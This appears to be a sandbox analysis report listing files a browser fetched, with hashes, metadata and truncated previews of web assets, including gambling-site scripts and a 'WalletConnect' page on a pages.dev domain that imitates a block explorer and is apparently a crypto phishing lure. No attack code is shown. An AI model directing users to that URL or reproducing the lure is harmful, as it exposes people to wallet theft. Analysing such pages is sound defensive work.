                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (31994), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):68208
                                                                                                                                                                                                                                              Entropy (8bit):5.353546857238987
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:NVzNGevmRzMMdZfupgfjJ3ijEO261NyYMk5Sl5BSENUfmqxGcTJ7PBTf:PNGevmRzMMdZfupgbJ3iPNyYMZlvZqxH
                                                                                                                                                                                                                                              MD5:A3A4507A81AC03776701CF28A75B3B66
                                                                                                                                                                                                                                              SHA1:70AA8E704D7C80A216C18262CD228D609272A25E
                                                                                                                                                                                                                                              SHA-256:8C53C7C7C83C02D6E7315DBAE64C7890A845324E2B8D443B0BCFEE0DD8F1F8E8
                                                                                                                                                                                                                                              SHA-512:79A6228D82F29BDECD04A64EFC9A28F0E34385CABF8C7B2E947F6845200FF075AF4FFEE51B4470D47452A7F8B1BC4853C8586C502B4ADA6875CEE63DDF11E314
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:// ==================================================..// fancyBox v3.5.6..//..// Licensed GPLv3 for open source use..// or fancyBox Commercial License for commercial use..//..// http://fancyapps.com/fancybox/..// Copyright 2018 fancyApps..//..// ==================================================..!function(t,e,n,o){"use strict";function i(t,e){var o,i,a,s=[],r=0;t&&t.isDefaultPrevented()||(t.preventDefault(),e=e||{},t&&t.data&&(e=h(t.data.options,e)),o=e.$target||n(t.currentTarget).trigger("blur"),(a=n.fancybox.getInstance())&&a.$trigger&&a.$trigger.is(o)||(e.selector?s=n(e.selector):(i=o.attr("data-fancybox")||"",i?(s=t.data?t.data.items:[],s=s.length?s.filter('[data-fancybox="'+i+'"]'):n('[data-fancybox="'+i+'"]')):s=[o]),r=n(s).index(o),r<0&&(r=0),a=n.fancybox.open(s,e,r),a.$trigger=o))}if(t.console=t.console||{info:function(t){}},n){if(n.fn.fancybox)return void console.info("fancyBox already initialized");var a={closeExisting:!1,loop:!1,gutter:50,keyboard:!0,preventCaptionOverlap:
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):73
                                                                                                                                                                                                                                              Entropy (8bit):4.596719252462243
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JSO+hX/+HwDRIB2D4VMO+DYQfDn:Ro/+HwNIB2D4he7
                                                                                                                                                                                                                                              MD5:18ED1D921EE75E6E14E6ECBEF83DF24A
                                                                                                                                                                                                                                              SHA1:EBAE7A1B89A951081E0670BAA4AFBD9D303F7979
                                                                                                                                                                                                                                              SHA-256:3BA01552794B8788D8B44F6DA7636DA8C1FEF7553B47C2780770DB7258E33D44
                                                                                                                                                                                                                                              SHA-512:409CA3BCDBFB6C471EC604026EFFAC9C12C574A8B664B878870439C52DB3740980E17E69635FB41C3DD3DE3CE93B2487D746066BBC664AD2E7F80035A889AEBC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/remoteEntry.js
                                                                                                                                                                                                                                              Preview:import{ae as f}from"./assets/manifest-51a3674f.js";export{f as default};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (656)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):657
                                                                                                                                                                                                                                              Entropy (8bit):5.092141398918879
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:nLvsSEcCEU5oNDFgDkRIc+iH6UvkLrdQcCeIiPF8PvTwzBT:nTstcCEUSFFvyGkLZTmI
                                                                                                                                                                                                                                              MD5:CCF193487B1500A9A0927429EEC046E6
                                                                                                                                                                                                                                              SHA1:7232C109C74BFB22756FCCD35C67A5818525B3FD
                                                                                                                                                                                                                                              SHA-256:6E5052D6A01FA3C8C664F1241A70C1CDCC4077D82094CD311004462828A47385
                                                                                                                                                                                                                                              SHA-512:7D052EF3E9566678666AA17877D9451C597C7635BEDCA4481705FB655D86B39696A4158684D6F5DB553441C8393B01B919A4445E4868D5115ADF0A04AC3FD31E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var l=typeof global=="object"&&global&&global.Object===Object&&global;const f=l;var g=typeof self=="object"&&self&&self.Object===Object&&self,s=f||g||Function("return this")();const j=s;var S=j.Symbol;const r=S;var n=Object.prototype,d=n.hasOwnProperty,T=n.toString,e=r?r.toStringTag:void 0;function y(t){var a=d.call(t,e),c=t[e];try{t[e]=void 0;var b=!0}catch(m){}var i=T.call(t);return b&&(a?t[e]=c:delete t[e]),i}var O=Object.prototype,u=O.toString;function p(t){return u.call(t)}var v="[object Null]",$="[object Undefined]",o=r?r.toStringTag:void 0;function h(t){return t==null?t===void 0?$:v:o&&o in Object(t)?y(t):p(t)}export{r as S,h as b,f,j as r};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (28280)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):28357
                                                                                                                                                                                                                                              Entropy (8bit):5.0624134780915675
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:bPEZHV4Vr1nDrFOXukj28r8HxLddsHHSeRwKZUsaPehMhvVgzCOPPUTvbRRViHdu:4ZuD8XukjRxNJevVgzCwUTNRM8DWM
                                                                                                                                                                                                                                              MD5:3DA9D866DAB0F5D7E264603CD909BF1B
                                                                                                                                                                                                                                              SHA1:41A2E068CCB7CDB9453A6D8BA451F32C2294D788
                                                                                                                                                                                                                                              SHA-256:23FC326908579CA62483339B5C66B4F1E1FE6EFDF2AE0D26EB16BB9ED0036E7F
                                                                                                                                                                                                                                              SHA-512:B7F4307A240DCF2A697BC0DD2947F76F2F898F4178BE11B701631894C76488F4C346D9C095B8D01D466D72B7FEF75969401F5F96DC9F3DB2447F355039381A37
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/index-kxowZSkm.js
                                                                                                                                                                                                                                              Preview:const e="AML",t="APP",o="Accept",n="Achievement",a="Active",i="Activities",r="Affiliate",s="All",l="Baseball",c="Basketball",u="Bingo",d="Blackjack",p="Blog",m="Bonus",_="CASINO",h="Cancel",y="Cash",g="Casino",w="Chat",f="Club",b="Completed",S="Confirm",k="Copyright",T="Cricket",C="Cryptocurrency",v="Daily",A="Dark",B="Deposit",E="Details",N="Explore",H="FAQ",P="FIFA",L="Fairness",R="Favorites",O="Forum",V="Futures",D="Game",F="Handball",M="Hidden",G="Hide",x="Highlights",W="History",I="Hour",U="Hours",z="Jackpot",Y="Keno",J="LCFC",K="League",$="Legal",j="License",q="Light",Q="Live",X="Lobby",Z="Lottery",ee="Matches",te="Menu",oe="Minute",ne="Minutes",ae="Monthly",ie="Multiplier",re="New",se="Newest",le="News",ce="Next",ue="Notification",de="Past",pe="Player",me="Popular",_e="Post",he="Prize",ye="Profit",ge="Promo",we="Promotions",fe="Providers",be="Racing",Se="Recent",ke="Recommend",Te="Recommended",Ce="Refer",ve="Result",Ae="Results",Be="Rounds",Ee="Rules",Ne="SPORTS",He="Search",Pe=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2829), with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2829
                                                                                                                                                                                                                                              Entropy (8bit):5.138132157470483
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:9GC4Us/cAAWDlDakNn7MrtDMEMKRS+EyK6yK4QP/779KD/OC:wos/Z5llENvVSfZ6Zhn7EOC
                                                                                                                                                                                                                                              MD5:AE0FAC465E284342BA8B74266F26B3A7
                                                                                                                                                                                                                                              SHA1:F77E04258A7908B7669EC561D67AE9EC81220D23
                                                                                                                                                                                                                                              SHA-256:FD6DE52714532EF0E51F17C151B185A24A157E15DA25A5551ECE557674667B86
                                                                                                                                                                                                                                              SHA-512:3698791CB2FD25AB8EEC2C26D340E4BDC380B04368E7E97CF74AD7717EC8D7186AC5497537E4B27D3B5E3203AEA563F17203A5A244EA82C710381D51C9CB2D76
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSCubeportfolio={_baseConfig:{},pageCollection:$(),init:function(selector,config){this.collection=selector&&$(selector).length?$(selector):$();if(!$(selector).length)return;this.config=config&&$.isPlainObject(config)?$.extend({},this._baseConfig,config):this._baseConfig;this.config.itemSelector=selector;this.initCubeportfolio();return this.pageCollection;},initCubeportfolio:function(){var $self=this,config=$self.config,collection=$self.pageCollection;this.collection.each(function(i,el){var $this=$(el),setControls=$this.data('controls'),setLayout=$this.data('layout'),setXGap=$this.data('x-gap'),setYGap=$this.data('y-gap'),setAnimation=$this.data('animation'),setCaptionAnimation=$this.data('caption-animation'),setLoadMoreSelector=$(this).data('load-more-selector'),setLoadMoreAction=$(this).data('load-more-action'),setLoadItemsAmount=$(this).data('load-items-amount'),setDefaultMediaQueries=[{width:1500,cols:3},{width:1100,cols:3},{width:800,c
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1045)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):30691
                                                                                                                                                                                                                                              Entropy (8bit):4.952933530189772
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:g5dBEQ8NQigwqJUm4wHoh0PmmAF0dFnWNg7agK4:g5cz0G0P5nWe77D
                                                                                                                                                                                                                                              MD5:9514966AB149989A0D5ABB51234FBE52
                                                                                                                                                                                                                                              SHA1:1C707D4EE0F255ADBAFC1B2AFBAEA6D86ACC1048
                                                                                                                                                                                                                                              SHA-256:A8A741C8078B583B6221856D7CC42D328C975C3744179B9BFE309DAFD3B343EE
                                                                                                                                                                                                                                              SHA-512:223535B63CD7E80E0B28C9AF5B7E7957B0C29271E2820C62D77993B3C1D24DD39F7E6BBE3EFF76BC29163F90B2FF1D01A769C9CE203EAF55F89E35333E6CD695
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSHeader={_baseConfig:{headerFixMoment:0,headerFixEffect:'slide',breakpointsMap:{'md':768,'sm':576,'lg':992,'xl':1200}},init:function(element){if(!element||element.length!==1||element.data('HSHeader'))return;var self=this;this.element=element;this.config=$.extend(true,{},this._baseConfig,element.data());this.observers=this._detectObservers();this.fixMediaDifference(this.element);this.element.data('HSHeader',new HSHeader(this.element,this.config,this.observers));$(window).on('scroll.uHeader',function(e){if($(window).scrollTop()<($(element).data('header-fix-moment')-100)&&$(element).data('effect-compensation')===true){$(element).css({top:-($(window).scrollTop())}).addClass($(element).data('effect-compensation-start-class')).removeClass($(element).data('effect-compensation-end-class'));}else if($(element).data('effect-compensation')===true){$(element).css({top:0}).addClass($(element).data('effect-compensation-end-class')).removeClass($(elemen
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9
                                                                                                                                                                                                                                              Entropy (8bit):2.94770277922009
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mn:mn
                                                                                                                                                                                                                                              MD5:722969577A96CA3953E84E3D949DEE81
                                                                                                                                                                                                                                              SHA1:3DAB5F6012E3E149B5A939B9CEBBA4A0B84DC8F5
                                                                                                                                                                                                                                              SHA-256:78342A0905A72CE44DA083DCB5D23B8EA0C16992BA2A82EECE97E033D76BA3D3
                                                                                                                                                                                                                                              SHA-512:54B2B4596CD1769E46A12A0CA6EDE70468985CF8771C2B11E75B3F52567A64418BC24C067D96D52037E0E135E7A7FF828AD0241D55B827506E1C67DE1CAEE8BC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:Forbidden
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9346
                                                                                                                                                                                                                                              Entropy (8bit):7.96904140592096
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:ztKbHqHxClRs1ZQ+zDLAJgSHm0s9A6qHSS0sR8x3fqbrZIVdjPaXL+Z:hHx2EQ6wG39HqaPfqnZ4jPayZ
                                                                                                                                                                                                                                              MD5:A4B7C76314747B75F4EF527B169EEAE3
                                                                                                                                                                                                                                              SHA1:DFD4CED3D8A79D90C90A1981189473191D99E2C9
                                                                                                                                                                                                                                              SHA-256:8558DA80C989A4FBDB50E1CDB47238F8C7E20AF5642C1E0CBC3713EE0C12079B
                                                                                                                                                                                                                                              SHA-512:35CB1FAF460B30CC4D17013A2448BC26F5C6656841DD0D969867ABB39C35A0A71C9ACEED74C7CAB2B072B51103DAC15E357E05563EBC37F415348165EDF25D39
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d........."..$....sRGB....... .IDATx^...z.......B{..I.q..A......I..s"........xY..:...8............~..<......:.....M.dZ..m...._.....;.,.."m..Z{;...?....O......,_.............RZ..H..k.cA..*Q.k]o%.*....].x.&....k....vP..c....$...>.m)S...u].z......c....U....ez....?.........o5..B@R. .=F...i....PS................Q..{p\......=..z..v.....!Q.8xQ.m>......].q..u..T.A.y........l..k.3.:~..\...J.......4....l.\..\."Y.....-$xX4S........wtt7c..../...?..a...{....c.jqYY./.o......P............U....u^..6c........~\.>l.x.....IJM...y..H9=(..)T..Y..O...R..f.. ./.......&..W.....O2...o...:k..k$.k^.V.Y...K*^%..g...........5...Y...wLK.m.t..... .\.7-.8^.d.%j..2.3.,..F...<..@....G.B\k.S...Y.U3>.)...v?./v.1..O.YAP..:.AMn....4.g]'.............E.uN.n.kv..(...B.....j.mKXr=..F'Y..y[.T,.aW...MB0....P,MAph../Z..Fi.r^....|2.....F.....|..[....y.%L...UFT4.>.Z.h!_.RG.d...w].....T}.5...s.B(.L..Z..CYw..s`.{....B_F.9....Q+.I..........u^..ZV..%
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):15776
                                                                                                                                                                                                                                              Entropy (8bit):7.983997148822431
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:3KOwNuTBK7ZtmRCAu1Pp/VkcPHQv2YriF9R:3KLAKE29VfPHe2Yr2R
                                                                                                                                                                                                                                              MD5:36B0E28B9991F23545F1C57889D183A2
                                                                                                                                                                                                                                              SHA1:384762D56EF06E00C9D878EA8F18A4B7A99EBB8D
                                                                                                                                                                                                                                              SHA-256:5FFC362DD37F55EF7BC25AA5DB2659E1F38D8C2DBD024CE2F787187DFB0F9731
                                                                                                                                                                                                                                              SHA-512:1DB202D4B3F44D1F1F209BB7C94729BBA4BA8164BD75D7B9EEF336165DBB4896BE511B9FFDD22DB005FC3856F74B0586E2B92016633288ADEF62AF7961242908
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/common/ban.png
                                                                                                                                                                                                                                              Preview:RIFF.=..WEBPVP8L.=../...w.m#G......+...g.C.n$.V..XD.l........m.I.....s{.=.Q$I.........8.F..L.T.1..........8....`.....k.v...F^.1_..j..s..\...6. .\...........4u...1.nqN.....!..i.T............... T@.a"X ...@..j... .Ce.h2lH..2.*.......T..".Y.....j.....p/`ru..*....v...I......l.d....,...%..V...r....Ff.V.DJ.7 .b..........PJ!-P.x6Gc; i.B o...h..Cl0...N6.....GKgy.E.....,.v.y.B....B. .._..I.+..........+..........+..........+..........+...........?...........G.'u....c.}.(.?`.~r$....C....G....;.{t..>..GG.A..$...?..A.<....~~dU!....&......#+...cNG...N.u.....&._~...4.{.&{...9<.RKR.d...c|:....*...?9&....6...;.D8.H8/|...G.......}.S.&{u.X.s...\'9=(t....G.....5.3.......$.....@.q.^.&....y.NTr......yQ....".....H'q.}#^d.7........m...|hE/&.;.......>.......4..G......R.. .T...G..?...=..M..S`E...i.VL.{..G.Q....?lq..3.3:...-.<?..-}_..V.P....z.'.Do.]...p..q..s.HN..t...?.....{..j\L.|.O..e.D...q.dt..'.......W.....o1........a.1!.......Dy..EK.....[Lx$UL.Bk.'kY>..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9461
                                                                                                                                                                                                                                              Entropy (8bit):7.6969507704834745
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:+7joYNMtKwXQniS+Zye/7ZxR00ZVrf137e0c2UPDrtZpiJkU:/YNg7XQnUZz/77RRrl72BiJ1
                                                                                                                                                                                                                                              MD5:D12E49091908838B2E506BDFC1A3AF0A
                                                                                                                                                                                                                                              SHA1:717A6D62B9C03732F5D9DAE792D679E23EE6CA4C
                                                                                                                                                                                                                                              SHA-256:E76E9F54CAEE7FABBCC7993E2032CD8366D4BBEB6995906749C245AAE93EA46A
                                                                                                                                                                                                                                              SHA-512:02FA2538CB6D736287C35C81D4EC22D742C0E6EA268BD8073495CF808F1059DE71ECB76C13524DB75DF81AFEE1926F0622A65AE1A9B4D33CD243B765BD273348
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/e77c37b458.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............F.................<...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):12138
                                                                                                                                                                                                                                              Entropy (8bit):7.868300883746729
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:oshXFLJz4weLqqjUYvtOccoTzcypBQIclI30e8h5kk0rQ8+M8mmrN/5g/KILE6nv:oqFLRs5vvT4ygIjkeCkk0k1dHg/xhv
                                                                                                                                                                                                                                              MD5:087C2DABEB1AD191193504D35AD63C89
                                                                                                                                                                                                                                              SHA1:AC9C74B4B3BF4BC7466F5ADC8A54D9936002D28E
                                                                                                                                                                                                                                              SHA-256:EA4347C813EEBCB4E80627CA75631D3DBB6C3AF90E04D550F9FD4432AEDF87C7
                                                                                                                                                                                                                                              SHA-512:D286D49B35F1FE077CFA920A27DB205BB4066DEC2CFACEB89DFD0F663DD7C922DC176496DD492B356F90FFDCA5A336E00B0B22DB9875BAAF8E146945822A92A1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............R.l.....sRGB.........gAMA......a.../.IDATx..n.P.....-...e`.....b).0.S.(S..K.2 ....C.....V.c7X....p. .'.r..W.$Nn.s...'.U.s.....|.+.J.x.....O-c.E....d.d..B.....\.b#..=......o..rg?.?.S.+.3..-..*..t.h!.C....Z...&.I...o....PJ.\If...M..:-c>k...#Y..B............R....'..BdmOK.e..!X...2Kbc./M6..TD.....Ck}eN.........|e.\yS.......H...........|.:..(.E..4... .0.....y...ij.[)...b....%..$c3....Yo.j.e~$!..hx......%.'G...xDB..9..^.....H4qwC...el.g...F..:!....D...v..s...{.L.i.h.?*y.m.7....:/....3.oYD..=....._o..7....o..I..%....B1.CH.......#`....(...Z......../[...j@.....:.Y...9j..H$4W.].|.q....rM..H.s~.eE?N.Srjvf.......1.qy.".'T.y.O...kt..3...z..lP...jDe:..Z.._\Og.......d}.7.t..*..s..W#*...q.O.Fn\.......h..g...u..tu...C.....4...V...].Hh>..g...W#*U6......r..CO.4..BY,.y.fY=.....F.....IJ.O.s.h...{..]U.e.'...&.p....n!..(...\"..&......\ .$.~.vT...ZZ..U...U..z.R..k.".......g..ef.|1...>.1.N...5.Zs].tT...?b..A]..d...N+.QX......6~?.P.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3335
                                                                                                                                                                                                                                              Entropy (8bit):5.141672953650712
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:sUGFvmaMrhY0JmdwpohKeR8upmYhTz+avmIe:keCdyJeEwzqX
                                                                                                                                                                                                                                              MD5:2942A4E6E63AC15BAC9745ABDB3DB699
                                                                                                                                                                                                                                              SHA1:4C4D16551B8DA648D0E3F3110B267CE3CE6D227F
                                                                                                                                                                                                                                              SHA-256:263AE708863BD5BDB16595105B4ED8FC23C79E65881A5FCD5A55307DCF39E329
                                                                                                                                                                                                                                              SHA-512:E24C59262ADE2EAA34846CA479539E0224B614124EF996BEC7C281708010F992F2F0EE46123E23C1CC4DA2B4AFC65B4CFFB1A0749209D22F3BD6EF5C4053B639
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/getWallets?page=1&entries=4
                                                                                                                                                                                                                                              Preview:{"count":434,"data":[{"id":"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96","name":"MetaMask","homepage":"https://metamask.io/","image_id":"018b2d52-10e9-4158-1fde-a5d5bac5aa00","order":10,"mobile_link":"metamask://","desktop_link":null,"link_mode":"https://metamask.app.link","webapp_link":null,"app_store":"https://apps.apple.com/us/app/metamask/id1438144202","play_store":"https://play.google.com/store/apps/details?id=io.metamask","rdns":"io.metamask","chrome_store":"https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn","injected":[{"namespace":"eip155","injected_id":"isMetaMask"}],"chains":["eip155:1"]},{"id":"4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0","name":"Trust Wallet","homepage":"https://trustwallet.com/","image_id":"7677b54f-3486-46e2-4e37-bf8747814f00","order":20,"mobile_link":"trust://","desktop_link":null,"link_mode":"https://link.trustwallet.com","webapp_link":null,"app_store":"https://apps.apple.com/ap
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
